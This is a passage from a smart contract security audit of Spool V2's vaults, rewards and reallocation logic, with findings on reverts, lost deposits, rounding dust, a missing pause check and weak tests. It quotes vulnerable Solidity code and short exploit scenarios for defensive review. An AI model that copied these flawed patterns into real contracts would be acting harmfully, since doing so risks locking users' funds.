    for (uint256 i; i < strategies.length; ++i) {
        _checkRole(ROLE_STRATEGY, strategies[i]);
        if (strategies[i] == _ghostStrategy) {
            continue;
        }
        [...]

Figure 21.2: A snippet of the redeemStrategyShares function in spool-v2-core/StrategyRegistry.sol#L477–L486

A ghost strategy will never have the ROLE_STRATEGY role, so both functions will always incorrectly revert if a ghost strategy is passed in the strategies array.

Exploit Scenario
Bob calls redeemStrategyShares with the ghost strategy in strategies, and the transaction unexpectedly reverts.

Recommendations
Short term, modify the affected functions so that they verify whether the given strategy is a ghost strategy before checking the role with _checkRole.
Long term, clearly document which roles a contract should have and implement the appropriate checks to verify them.

+22. Reward configuration not initialized properly when reward is zero
Severity: Low Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-22
Target: rewards/RewardManager.sol

Description
The RewardManager.addToken function, which adds a new reward token for the given smart vault, does not initialize all configuration variables when the initial reward is zero. As a result, all calls to the RewardManager.extendRewardEmission function will fail, and rewards cannot be added for that vault.

RewardManager.addToken adds a new reward token for the given smart vault. The reward tokens for a smart vault are tracked in the RewardManager.rewardConfiguration mapping. The tokenAdded value of the configuration is used to check whether the token has already been added for the vault (figure 22.1).

function addToken(
    address smartVault,
    IERC20 token,
    uint32 rewardsDuration,
    uint256 reward
) external onlyAdminOrVaultAdmin(smartVault, msg.sender) exceptUnderlying(smartVault, token) {
    RewardConfiguration storage config = rewardConfiguration[smartVault][token];

    if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token));
    if (config.tokenAdded != 0) revert RewardTokenAlreadyAdded(address(token));
    if (rewardsDuration == 0) revert InvalidRewardDuration();
    if (rewardTokensCount[smartVault] > 5) revert RewardTokenCapReached();

    rewardTokens[smartVault][rewardTokensCount[smartVault]] = token;
    rewardTokensCount[smartVault]++;

    config.rewardsDuration = rewardsDuration;

    if (reward > 0) {
        _extendRewardEmission(smartVault, token, reward);
    }
}

Figure 22.1: The addToken function in spool-v2-core/RewardManager.sol#L81–L101

However, RewardManager.addToken does not update config.tokenAdded, and the _extendRewardEmission function, which updates config.tokenAdded, is called only when the reward is greater than zero. RewardManager.extendRewardEmission is the only entry point for adding rewards to a vault. It checks whether the token has been previously added by verifying that tokenAdded is greater than zero (figure 22.2).
function extendRewardEmission ( address smartVault , IERC20 token, uint256 reward , uint32 rewardsDuration ) external onlyAdminOrVaultAdmin(smartVault, msg.sender ) exceptUnderlying(smartVault, token) { if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted( address (token)); if (rewardsDuration == 0 ) revert InvalidRewardDuration(); if ( rewardConfiguration[smartVault][token].tokenAdded == 0 ) { revert InvalidRewardToken( address (token)); } [...] } Figure 22.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol#L106–L119 Because tokenAdded is not initialized when the initial rewards are zero, the vault admin cannot add the rewards for the vault in that token. The impact of this issue is lower because the vault admin can use the RewardManager.removeReward function to remove the token and add it again with a nonzero initial reward. Note that the vault admin can only remove the token without blacklisting it because the config.periodFinish value is also not initialized when the initial reward is zero. Exploit Scenario Alice is the admin of a smart vault. She adds a reward token for her smart vault with the initial reward set to zero. Alice tries to add rewards using extendRewardEmission , and the transaction fails. She cannot add rewards for her smart vault. She has to remove the token and re-add it with a nonzero initial reward. Recommendations Short term, use a separate Boolean variable to track whether a token has been added for a smart vault, and have RewardManager.addToken initialize that variable. Long term, improve the system’s unit tests to cover all execution paths. +23. Missing function for removing reward tokens from the blacklist Severity: Informational Difficulty: High Type: Undefined Behavior Finding ID: TOB-SPL-23 Target: rewards/RewardManager.sol Description A Spool admin can blacklist a reward token for a smart vault through the RewardManager contract, but they cannot remove it from the blacklist. As a result, a reward token cannot be used again once it is blacklisted. The RewardManager.forceRemoveReward function blacklists the given reward token by updating the RewardManager.tokenBlacklist array (figure 23.1). Blacklisted tokens cannot be used as rewards. function forceRemoveReward ( address smartVault , IERC20 token) external onlyRole(ROLE_SPOOL_ADMIN, msg.sender ) { tokenBlacklist[smartVault][token] = true ; _removeReward(smartVault, token); delete rewardConfiguration[smartVault][token]; } Figure 23.1: The forceRemoveReward function in spool-v2-core/RewardManager.sol#L160–L165 However, RewardManager does not have a function to remove tokens from the blacklist. As a result, if the Spool admin accidentally blacklists a token, then the smart vault admin will never be able to use that token to send rewards. Exploit Scenario Alice is the admin of a smart vault. She adds WETH and token A as rewards. The value of token A declines rapidly, so a Spool admin decides to blacklist the token for Alice’s vault. The Spool admin accidentally supplies the WETH address in the call to forceRemoveReward . As a result, WETH is blacklisted, and Alice cannot send rewards in WETH. Recommendations Short term, add a function with the proper access controls to remove tokens from the blacklist. Long term, improve the system’s unit tests to cover all execution paths. +24. 
Risk of unclaimed shares due to loss of precision in reallocation operations
Severity: Informational Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-24
Target: libraries/ReallocationLib.sol

Description
The ReallocationLib.calculateReallocation function releases strategy shares and calculates their USD value. The USD value is later converted into strategy shares in the ReallocationLib.doReallocation function. Because the conversion operations always round down, the number of shares calculated in doReallocation will be less than the shares released in calculateReallocation. As a result, some shares released in calculateReallocation will be unclaimed, as ReallocationLib distributes only the shares computed in doReallocation.

ReallocationLib.calculateReallocation calculates the USD value that needs to be withdrawn from each of the strategies used by smart vaults (figure 24.1). The smart vaults release the shares equivalent to the calculated USD value.

/**
 * @dev Calculates reallocation needed per smart vault.
 [...]
 * @return Reallocation of the smart vault:
 * - first index is 0 or 1
 * - 0:
 *   - second index runs over smart vault's strategies
 *   - value is USD value that needs to be withdrawn from the strategy
 [...]
 */
function calculateReallocation(
    [...]
) private returns (uint256[][] memory) {
    [...]
    } else if (targetValue < currentValue) {
        // This strategy needs withdrawal.
        [...]
        IStrategy(smartVaultStrategies[i]).releaseShares(smartVault, sharesToRedeem);

        // Recalculate value to withdraw based on released shares.
        reallocation[0][i] = IStrategy(smartVaultStrategies[i]).totalUsdValue()
            * sharesToRedeem / IStrategy(smartVaultStrategies[i]).totalSupply();
    }

    return reallocation;
}

Figure 24.1: The calculateReallocation function in spool-v2-core/ReallocationLib.sol#L161–L207

The ReallocationLib.buildReallocationTable function calculates the reallocationTable value. The reallocationTable[i][j][0] value represents the USD amount that should move from strategy i to strategy j (figure 24.2). These USD amounts are calculated using the USD values of the released shares computed in ReallocationLib.calculateReallocation (represented by reallocation[0][i] in figure 24.1).

/**
 [...]
 * @return Reallocation table:
 * - first index runs over all strategies i
 * - second index runs over all strategies j
 * - third index is 0, 1 or 2
 * - 0: value represents USD value that should be withdrawn by strategy i and deposited into strategy j
 */
function buildReallocationTable(
    [...]
) private pure returns (uint256[][][] memory) {

Figure 24.2: A snippet of the buildReallocationTable function in spool-v2-core/ReallocationLib.sol#L209–L228

ReallocationLib.doReallocation calculates the total USD amount that should be withdrawn from a strategy (figure 24.3). This total USD amount is exactly equal to the sum of the USD values that need to be withdrawn from the strategy for each of the smart vaults. The doReallocation function converts the total USD value to the equivalent number of strategy shares. The ReallocationLib library withdraws this exact number of shares from the strategy and distributes them to other strategies that require deposits of these shares.

function doReallocation(
    [...]
    uint256[][][] memory reallocationTable
) private {
    // Distribute matched shares and withdraw unmatched ones.
    for (uint256 i; i < strategies.length; ++i) {
        [...]
        {
            uint256[2] memory totals; // totals[0] -> total withdrawals
            for (uint256 j; j < strategies.length; ++j) {
                totals[0] += reallocationTable[i][j][0];
                [...]
            }

            // Calculate amount of shares to redeem and to distribute.
            uint256 sharesToDistribute =
                // first store here total amount of shares that should have been withdrawn
                IStrategy(strategies[i]).totalSupply() * totals[0] / IStrategy(strategies[i]).totalUsdValue();
            [...]
        }
        [...]

Figure 24.3: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285–L350

Theoretically, the shares calculated for a strategy should be equal to the shares released by all of the smart vaults for that strategy. However, there is a loss of precision in both the calculateReallocation function's calculation of the USD value of released shares and the doReallocation function's conversion of the combined USD value to strategy shares. As a result, the number of shares calculated in doReallocation will be less than the shares released by the smart vaults in calculateReallocation. Because the ReallocationLib library only distributes these calculated shares, there will be some unclaimed strategy shares left as dust. It is important to note that the rounding error could be greater than one in the context of multiple smart vaults. Additionally, the error could be even greater if the conversion results were rounded in the opposite direction: in that case, if the calculated shares were greater than the released shares, the reallocation would fail when burn and claim operations are executed.

Recommendations
Short term, modify the code so that it stores the number of shares released in calculateReallocation, and implement dustless calculations to build the reallocationTable value with the share amounts and the USD amounts. Have doReallocation use this reallocationTable value to calculate the value of sharesToDistribute.
Long term, use Echidna to test system and mathematical invariants.

+25. Curve3CoinPoolAdapter's _addLiquidity reverts due to incorrect amounts deposited
Severity: Medium Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-25
Target: strategies/curve/CurveAdapter.sol

Description
The _addLiquidity function loops through the amounts array but uses an additional element to keep track of whether deposits need to be made in the Strategy.doHardWork function. As a result, _addLiquidity overwrites the number of tokens to send for the first asset, causing far fewer tokens to be deposited than expected, thus causing the transaction to revert due to the slippage check.

function _addLiquidity(uint256[] memory amounts, uint256 slippage) internal {
    uint256[N_COINS] memory curveAmounts;

    for (uint256 i; i < amounts.length; ++i) {
        curveAmounts[assetMapping().get(i)] = amounts[i];
    }

    ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage);
}

Figure 25.1: The _addLiquidity function in spool-v2-core/CurveAdapter.sol#L12–L20

The last element in the doHardWork function's assetsToDeposit array keeps track of the deposits to be made and is incremented by one on each iteration of assets in assetGroup if that asset has tokens to deposit. This variable is then passed to the _depositToProtocol function and then, for strategies that use the Curve3CoinPoolAdapter, is passed to _addLiquidity in the amounts parameter. When _addLiquidity iterates over the last element in the amounts array, assetMapping().get(i) returns 0 because the mapping has no entry for that extra index.
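For illustration, a minimal sketch of the short-term fix recommended at the end of this finding: iterate over only the first N_COINS entries so the trailing sentinel element is never mapped. The names (N_COINS, assetMapping, pool) follow the snippet in figure 25.1; this is a hedged sketch, not the project's patch.

    // Illustrative sketch: ignore the trailing "is there anything to
    // deposit" element by looping exactly N_COINS times.
    function _addLiquidity(uint256[] memory amounts, uint256 slippage) internal {
        uint256[N_COINS] memory curveAmounts;

        for (uint256 i; i < N_COINS; ++i) {
            curveAmounts[assetMapping().get(i)] = amounts[i];
        }

        ICurve3CoinPool(pool()).add_liquidity(curveAmounts, slippage);
    }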
In the unfixed code, that zero return value overwrites the number of tokens to deposit for the first asset with a strictly smaller amount.

function doHardWork(StrategyDhwParameterBag calldata dhwParams) external returns (DhwInfo memory dhwInfo) {
    _checkRole(ROLE_STRATEGY_REGISTRY, msg.sender);

    // assetsToDeposit[0..token.length-1]: amount of asset i to deposit
    // assetsToDeposit[token.length]: is there anything to deposit
    uint256[] memory assetsToDeposit = new uint256[](dhwParams.assetGroup.length + 1);
    unchecked {
        for (uint256 i; i < dhwParams.assetGroup.length; ++i) {
            assetsToDeposit[i] = IERC20(dhwParams.assetGroup[i]).balanceOf(address(this));

            if (assetsToDeposit[i] > 0) {
                ++assetsToDeposit[dhwParams.assetGroup.length];
            }
        }
    }
    [...]
    // - deposit assets into the protocol
    _depositToProtocol(dhwParams.assetGroup, assetsToDeposit, dhwParams.slippages);

Figure 25.2: A snippet of the doHardWork function in spool-v2-core/Strategy.sol#L71–L75

Exploit Scenario
The doHardWork function is called for a smart vault that uses the ConvexAlusdStrategy strategy; however, the subsequent call to _addLiquidity reverts due to the incorrect number of assets that it is trying to deposit. The smart vault is unusable.

Recommendations
Short term, have _addLiquidity loop over only the first N_COINS elements of the amounts array instead of its full length.
Long term, refactor the Strategy.doHardWork function so that it does not use an additional element in the assetsToDeposit array to keep track of whether deposits need to be made. Instead, use a separate Boolean variable. The current pattern is too error-prone.

+26. Reallocation process reverts when a ghost strategy is present
Severity: High Difficulty: High Type: Data Validation Finding ID: TOB-SPL-26
Target: libraries/ReallocationLib.sol

Description
The reallocation process reverts in multiple places when a ghost strategy is present. As a result, it is impossible to reallocate a smart vault with a ghost strategy.

The first revert would occur in the mapStrategies function (figure 26.1). Users calling the reallocate function would not know to add the ghost strategy address in the strategies array, which holds the strategies that need to be reallocated. This function reverts if it does not find a strategy in the array. Even if the ghost strategy address is in strategies, a revert would occur in the areas described below.

function mapStrategies(
    address[] calldata smartVaults,
    address[] calldata strategies,
    mapping(address => address[]) storage _smartVaultStrategies
) private view returns (uint256[][] memory) {
    [...]
    // Loop over smart vault's strategies.
    for (uint256 j; j < smartVaultStrategiesLength; ++j) {
        address strategy = smartVaultStrategies[j];
        bool found = false;

        // Try to find the strategy in the provided list of strategies.
        for (uint256 k; k < strategies.length; ++k) {
            if (strategies[k] == strategy) {
                // Match found.
                found = true;
                strategyMatched[k] = true;
                // Add entry to the strategy mapping.
                strategyMapping[i][j] = k;
                break;
            }
        }

        if (!found) {
            // If a smart vault's strategy was not found in the provided list
            // of strategies, this means that the provided list is invalid.
            revert InvalidStrategies();
        }
    }
}

Figure 26.1: A snippet of the mapStrategies function in spool-v2-core/ReallocationLib.sol#L86–L144

During the reallocation process, the doReallocation function calls the beforeRedeemalCheck and beforeDepositCheck functions even on ghost strategies (figure 26.2); however, their implementation is to revert on ghost strategies with an IsGhostStrategy error (figure 26.3).
function doReallocation(
    address[] calldata strategies,
    ReallocationParameterBag calldata reallocationParams,
    uint256[][][] memory reallocationTable
) private {
    [...]
    if (totals[0] == 0) {
        IStrategy(strategies[i]).beforeRedeemalCheck(0, reallocationParams.withdrawalSlippages[i]);

        // There is nothing to withdraw from strategy i.
        continue;
    }

    // Calculate amount of shares to redeem and to distribute.
    uint256 sharesToDistribute =
        // first store here total amount of shares that should have been withdrawn
        IStrategy(strategies[i]).totalSupply() * totals[0] / IStrategy(strategies[i]).totalUsdValue();

    IStrategy(strategies[i]).beforeRedeemalCheck(
        sharesToDistribute,
        reallocationParams.withdrawalSlippages[i]
    );
    [...]
    // Deposit assets into the underlying protocols.
    for (uint256 i; i < strategies.length; ++i) {
        IStrategy(strategies[i]).beforeDepositCheck(toDeposit[i], reallocationParams.depositSlippages[i]);
    [...]

Figure 26.2: A snippet of the doReallocation function in spool-v2-core/ReallocationLib.sol#L285–L469

contract GhostStrategy is IERC20Upgradeable, IStrategy {
    [...]
    function beforeDepositCheck(uint256[] memory, uint256[] calldata) external pure {
        revert IsGhostStrategy();
    }

    function beforeRedeemalCheck(uint256, uint256[] calldata) external pure {
        revert IsGhostStrategy();
    }

Figure 26.3: The beforeDepositCheck and beforeRedeemalCheck functions in spool-v2-core/GhostStrategy.sol#L98–L104

Exploit Scenario
A strategy is removed from a smart vault. Bob, who has the ROLE_ALLOCATOR role, calls reallocate, but it reverts, and the smart vault is impossible to reallocate.

Recommendations
Short term, modify the associated code so that ghost strategies are not passed to the reallocate function in the _smartVaultStrategies parameter.
Long term, improve the system's unit and integration tests to test for smart vaults with ghost strategies. Such tests are currently missing.

+27. Broken test cases that hide security issues
Severity: Informational Difficulty: Undetermined Type: Testing Finding ID: TOB-SPL-27
Target: test/RewardManager.t.sol, test/integration/RemoveStrategy.t.sol

Description
Multiple test cases do not check sufficient conditions to verify the correctness of the code, which could result in the deployment of buggy code in production and the loss of funds.
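As an illustration of the level of checking these tests need (the specific insufficient cases follow below), consider a Foundry-style sketch. The assertions rely on hypothetical getters: the exact shape of RewardConfiguration and its accessors is not shown here, so the names below are assumptions, not the project's API.

    // Illustrative sketch only: after extending an emission, assert the
    // observable state actually changed, rather than only that the call
    // did not revert.
    function test_extendRewardEmission_updatesRateAndDuration() public {
        deal(address(rewardToken), vaultOwner, rewardAmount * 2, true);

        vm.startPrank(vaultOwner);
        rewardToken.approve(address(rewardManager), rewardAmount * 2);
        rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount);
        rewardManager.extendRewardEmission(smartVault, rewardToken, 1 ether, rewardDuration);
        vm.stopPrank();

        // Hypothetical getter; the real test should read the stored
        // RewardConfiguration and check its rewardRate and periodFinish
        // fields, assuming Synthetix-style reward accounting.
        (uint256 rate, uint256 periodFinish) =
            rewardManager.rewardRateAndPeriodFinish(smartVault, rewardToken);
        assertGt(rate, 0);
        assertEq(periodFinish, block.timestamp + rewardDuration);
    }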
The test_extendRewardEmission_ok test does not check the new reward rate and duration to verify the effect of the call to the extendRewardEmission function on the RewardManager contract: function test_extendRewardEmission_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount * 2, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount * 2); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); rewardManager.extendRewardEmission(smartVault, rewardToken, 1 ether, rewardDuration); vm.stopPrank(); } Figure 27.1: An insufficient test case for extendRewardEmission spool-v2-core/RewardManager.t.sol The test_removeReward_ok test does not check the new reward token count and the deletion of the reward configuration for the smart vault to verify the effect of the call to the removeReward function on the RewardManager contract: function test_removeReward_ok() public { deal(address(rewardToken), vaultOwner, rewardAmount, true); vm.startPrank(vaultOwner); rewardToken.approve(address(rewardManager), rewardAmount); rewardManager.addToken(smartVault, rewardToken, rewardDuration, rewardAmount); skip(rewardDuration + 1); rewardManager.removeReward(smartVault, rewardToken); vm.stopPrank(); } Figure 27.2: An insufficient test case for removeReward spool-v2-core/RewardManager.t.sol There is no test case to check the access controls of the removeReward function. Similarly, the test_forceRemoveReward_ok test does not check the effects of the forced removal of a reward token. Findings TOB-SPL-28 and TOB-SPL-29 were not detected by tests because of these broken test cases. The test_removeStrategy_betweenFlushAndDHW test does not check the balance of the master wallet. The test_removeStrategy_betweenFlushAndDhwWithdrawals test removes the strategy before the “do hard work” execution of the deposit cycle instead of removing it before the “do hard work” execution of the withdrawal cycle, making this test case redundant. Finding TOB-SPL-33 would have been detected if this test had been correctly implemented. There may be other broken tests that we did not find, as we could not cover all of the test cases. Exploit Scenario The Spool team deploys the protocol. After some time, the Spool team makes some changes in the code that introduces a bug that goes unnoticed due to the broken test cases. The team deploys the new changes with confidence in their tests and ends up introducing a security issue in the production deployment of the protocol. Recommendations Short term, fix the test cases described above. Long term, review all of the system’s test cases and make sure that they verify the given state change correctly and sufficiently after an interaction with the protocol. Use Necessist to find broken test cases and fix them. +28. Reward emission can be extended for a removed reward token Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-SPL-28 Target: rewards/RewardManager.sol Description Smart vault owners can extend the reward emission for a removed token, which may cause tokens to be stuck in the RewardManager contract. 
The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration:

function _removeReward(address smartVault, IERC20 token) private {
    uint256 _rewardTokensCount = rewardTokensCount[smartVault];
    for (uint256 i; i < _rewardTokensCount; ++i) {
        if (rewardTokens[smartVault][i] == token) {
            rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1];
            delete rewardTokens[smartVault][_rewardTokensCount - 1];
            rewardTokensCount[smartVault]--;
            emit RewardRemoved(smartVault, token);
            break;
        }
    }
}

Figure 28.1: The _removeReward function in spool-v2-core/RewardManager.sol

The extendRewardEmission function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is not zero to make sure that the token was already added to the smart vault:

function extendRewardEmission(address smartVault, IERC20 token, uint256 reward, uint32 rewardsDuration)
    external
    onlyAdminOrVaultAdmin(smartVault, msg.sender)
    exceptUnderlying(smartVault, token)
{
    if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token));
    if (rewardsDuration == 0) revert InvalidRewardDuration();

    if (rewardConfiguration[smartVault][token].tokenAdded == 0) {
        revert InvalidRewardToken(address(token));
    }

    rewardConfiguration[smartVault][token].rewardsDuration = rewardsDuration;
    _extendRewardEmission(smartVault, token, reward);
}

Figure 28.2: The extendRewardEmission function in spool-v2-core/RewardManager.sol

After removing a reward token from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which allows the smart vault owner to extend the reward emission for the removed token.

Exploit Scenario
Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. After some time, she forgets that she removed token A from her vault. She calls extendRewardEmission with 1,000 token A as the reward. The amount of token A is transferred from Alice to the RewardManager contract, but it is not distributed to the users because it is not present in the list of reward tokens added for smart vault S. The 1,000 tokens are stuck in the RewardManager contract.

Recommendations
Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault.
Long term, add test cases to check for expected user interactions to catch bugs such as this.

+29. A reward token cannot be added once it is removed from a smart vault
Severity: Low Difficulty: Low Type: Data Validation Finding ID: TOB-SPL-29
Target: rewards/RewardManager.sol

Description
Smart vault owners cannot add reward tokens again after they have been removed once from the smart vault, making owners incapable of providing incentives to users.
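This finding and TOB-SPL-28 above share a root cause, and their short-term recommendations coincide. A minimal sketch of the shared fix, deleting the per-token configuration when the reward is removed; it mirrors the mapping layout shown in figures 28.1 and 28.2 but is an illustration, not the project's patch:

    // Illustrative sketch: clearing the stored configuration on removal
    // resets tokenAdded, so the token can later be re-added and its
    // emission can no longer be extended after removal.
    function _removeReward(address smartVault, IERC20 token) private {
        uint256 _rewardTokensCount = rewardTokensCount[smartVault];
        for (uint256 i; i < _rewardTokensCount; ++i) {
            if (rewardTokens[smartVault][i] == token) {
                rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1];
                delete rewardTokens[smartVault][_rewardTokensCount - 1];
                rewardTokensCount[smartVault]--;
                delete rewardConfiguration[smartVault][token]; // the added line
                emit RewardRemoved(smartVault, token);
                break;
            }
        }
    }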
The removeReward function in the RewardManager contract calls the _removeReward function, which does not remove the reward configuration:

function _removeReward(address smartVault, IERC20 token) private {
    uint256 _rewardTokensCount = rewardTokensCount[smartVault];
    for (uint256 i; i < _rewardTokensCount; ++i) {
        if (rewardTokens[smartVault][i] == token) {
            rewardTokens[smartVault][i] = rewardTokens[smartVault][_rewardTokensCount - 1];
            delete rewardTokens[smartVault][_rewardTokensCount - 1];
            rewardTokensCount[smartVault]--;
            emit RewardRemoved(smartVault, token);
            break;
        }
    }
}

Figure 29.1: The _removeReward function in spool-v2-core/RewardManager.sol

The addToken function checks whether the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is zero to make sure that the token was not already added to the smart vault:

function addToken(address smartVault, IERC20 token, uint32 rewardsDuration, uint256 reward)
    external
    onlyAdminOrVaultAdmin(smartVault, msg.sender)
    exceptUnderlying(smartVault, token)
{
    RewardConfiguration storage config = rewardConfiguration[smartVault][token];

    if (tokenBlacklist[smartVault][token]) revert RewardTokenBlacklisted(address(token));
    if (config.tokenAdded != 0) revert RewardTokenAlreadyAdded(address(token));
    if (rewardsDuration == 0) revert InvalidRewardDuration();
    if (rewardTokensCount[smartVault] > 5) revert RewardTokenCapReached();

    rewardTokens[smartVault][rewardTokensCount[smartVault]] = token;
    rewardTokensCount[smartVault]++;

    config.rewardsDuration = rewardsDuration;

    if (reward > 0) {
        _extendRewardEmission(smartVault, token, reward);
    }
}

Figure 29.2: The addToken function in spool-v2-core/RewardManager.sol

After a reward token is removed from a smart vault, the value of tokenAdded in the rewardConfiguration[smartVault][token] configuration is left as nonzero, which prevents the smart vault owner from adding the token again for reward distribution as an incentive to the users of the smart vault.

Exploit Scenario
Alice adds a reward token A to her smart vault S. After a month, she removes token A from her smart vault. Noticing the success of her earlier reward incentive program, she wants to add reward token A to her smart vault again, but her transaction to add the reward token reverts, leaving her with no choice but to distribute another token.

Recommendations
Short term, modify the associated code so that it deletes the rewardConfiguration[smartVault][token] configuration when removing a reward token for a smart vault.
Long term, add test cases to check for expected user interactions to catch bugs such as this.

+30. Missing whenNotPaused modifier
Severity: Low Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-30
Target: rewards/RewardPool.sol

Description
The documentation specifies which functionalities should not be working when the system is paused, including the claiming of rewards; however, the claim function does not have the whenNotPaused modifier. As a result, users can claim their rewards even when the system is paused.

If the system is paused:
- users can't claim vault incentives
- [...]

Figure 30.1: A snippet of the provided Spool documentation

function claim(ClaimRequest[] calldata data) public {

Figure 30.2: The claim function header in spool-v2-core/RewardPool.sol#L47

Exploit Scenario
Alice, who has the ROLE_PAUSER role in the system, pauses the protocol after she sees a possible vulnerability in the claim function.
The Spool team believes there are no possible funds moving from the system; however, users can still claim their rewards. Recommendations Short term, add the whenNotPaused modifier to the claim function. Long term, improve the system’s unit and integration tests by adding a test to verify that the expected functionalities do not work when the system is in a paused state. +31. Users who deposit and then withdraw before doHardWork lose their tokens Severity: High Difficulty: Low Type: Undefined Behavior Finding ID: TOB-SPL-31 Target: managers/DepositManager.sol Description Users who deposit and then withdraw assets before doHardWork is called will receive zero tokens from their withdrawal operations. When a user deposits assets, the depositAssets function mints an NFT with some metadata to the user who can later redeem it for the underlying SVT tokens. function depositAssets(DepositBag calldata bag, DepositExtras calldata bag2) external onlyRole(ROLE_SMART_VAULT_MANAGER, msg.sender) returns ( uint256 [] memory , uint256 ) { [...] // mint deposit NFT DepositMetadata memory metadata = DepositMetadata(bag.assets, block.timestamp , bag2.flushIndex); uint256 depositId = ISmartVault(bag.smartVault).mintDepositNFT(bag.receiver, metadata); [...] } Figure 31.1: A snippet of the depositAssets function in spool-v2-core/DepositManager.sol#L379–L439 Users call the claimSmartVaultTokens function in the SmartVaultManager contract to claim SVT tokens. It is important to note that this function calls the _syncSmartVault function with false as the last argument, which means that it will not revert if the current flush index and the flush index to sync are the same. Then, claimSmartVaultTokens delegates the work to the corresponding function in the DepositManager contract. function claimSmartVaultTokens( address smartVault, uint256 [] calldata nftIds, uint256 [] calldata nftAmounts) public whenNotPaused returns ( uint256 ) { _onlyRegisteredSmartVault(smartVault); address [] memory tokens = _assetGroupRegistry.listAssetGroup(_smartVaultAssetGroups[smartVault]); _syncSmartVault(smartVault, _smartVaultStrategies[smartVault], tokens, false ); return _depositManager.claimSmartVaultTokens(smartVault, nftIds, nftAmounts, tokens, msg.sender ); } Figure 31.2: A snippet of the claimSmartVaultTokens function in spool-v2-core/SmartVaultManager.sol#L238–L247 Later, the claimSmartVaultTokens function in DepositManager (figure 31.3) computes the SVT tokens that users will receive by calling the getClaimedVaultTokensPreview function and passing the bag.mintedSVTs value for the flush corresponding to the burned NFT. function claimSmartVaultTokens( address smartVault, uint256 [] calldata nftIds, uint256 [] calldata nftAmounts, address [] calldata tokens, address executor ) external returns ( uint256 ) { _checkRole(ROLE_SMART_VAULT_MANAGER, msg.sender ); [...] 
    ClaimTokensLocalBag memory bag;
    ISmartVault vault = ISmartVault(smartVault);
    bag.metadata = vault.burnNFTs(executor, nftIds, nftAmounts);

    for (uint256 i; i < nftIds.length; ++i) {
        if (nftIds[i] > MAXIMAL_DEPOSIT_ID) {
            revert InvalidDepositNftId(nftIds[i]);
        }

        // we can pass empty strategy array and empty DHW index array,
        // because vault should already be synced and mintedVaultShares values available
        bag.data = abi.decode(bag.metadata[i], (DepositMetadata));
        bag.mintedSVTs = _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares;

        claimedVaultTokens +=
            getClaimedVaultTokensPreview(smartVault, bag.data, nftAmounts[i], bag.mintedSVTs, tokens);
    }

Figure 31.3: A snippet of the claimSmartVaultTokens function in spool-v2-core/DepositManager.sol#L135–L184

Then, getClaimedVaultTokensPreview calculates the SVT tokens proportional to the amount deposited.

function getClaimedVaultTokensPreview(
    address smartVaultAddress,
    DepositMetadata memory data,
    uint256 nftShares,
    uint256 mintedSVTs,
    address[] calldata tokens
) public view returns (uint256) {
    [...]
    for (uint256 i; i < data.assets.length; ++i) {
        depositedUsd += _priceFeedManager.assetToUsdCustomPrice(tokens[i], data.assets[i], exchangeRates[i]);
        totalDepositedUsd +=
            _priceFeedManager.assetToUsdCustomPrice(tokens[i], totalDepositedAssets[i], exchangeRates[i]);
    }
    uint256 claimedVaultTokens = mintedSVTs * depositedUsd / totalDepositedUsd;

    return claimedVaultTokens * nftShares / NFT_MINTED_SHARES;
}

Figure 31.4: A snippet of the getClaimedVaultTokensPreview function in spool-v2-core/DepositManager.sol#L546–L572

However, the value of _flushShares[smartVault][bag.data.flushIndex].mintedVaultShares, shown in figure 31.3, will always be 0: the value is updated in the syncDeposit function, but because the current flush cycle is not finished yet, syncDeposit cannot be called through syncSmartVault. The same problem appears in the redeem, redeemFast, and claimWithdrawal functions.

Exploit Scenario
Bob deposits assets into a smart vault, but he notices that he deposited into the wrong smart vault. He calls redeem and claimWithdrawal, expecting to receive his tokens back, but he receives zero tokens. The tokens are locked in the smart contracts.

Recommendations
Short term, do not allow users to withdraw tokens when the corresponding flush has not yet happened.
Long term, document and test the expected effects of calling functions in all possible orders, and add adequate constraints to avoid unexpected behavior.

+32. Lack of events emitted for state-changing functions
Severity: Informational Difficulty: Low Type: Auditing and Logging Finding ID: TOB-SPL-32
Target: src/

Description
Multiple critical operations do not emit events. As a result, it will be difficult to review the correct behavior of the contracts once they have been deployed. Events generated during contract execution aid in monitoring, baselining of behavior, and detection of suspicious activity. Without events, users and blockchain-monitoring systems cannot easily detect behavior that falls outside baseline conditions. This may prevent malfunctioning contracts or attacks from being detected.
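As one example of the missing instrumentation, a hedged sketch of what an event for SpoolAccessControl.grantSmartVaultOwnership could look like; the event name and fields are assumptions for illustration, not the project's API:

    // Illustrative sketch only: emit an event whenever smart vault
    // ownership is granted, so off-chain monitoring can track it.
    event SmartVaultOwnershipGranted(address indexed smartVault, address indexed owner);

    function grantSmartVaultOwnership(address smartVault, address owner) external {
        // ... existing access control checks and state changes ...
        emit SmartVaultOwnershipGranted(smartVault, owner);
    }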
The following operations should trigger events:
● SpoolAccessControl.grantSmartVaultOwnership
● ActionManager.setActions
● SmartVaultManager.registerSmartVault
● SmartVaultManager.removeStrategy
● SmartVaultManager.syncSmartVault
● SmartVaultManager.reallocate
● StrategyRegistry.registerStrategy
● StrategyRegistry.removeStrategy
● StrategyRegistry.doHardWork
● StrategyRegistry.setEcosystemFee
● StrategyRegistry.setEcosystemFeeReceiver
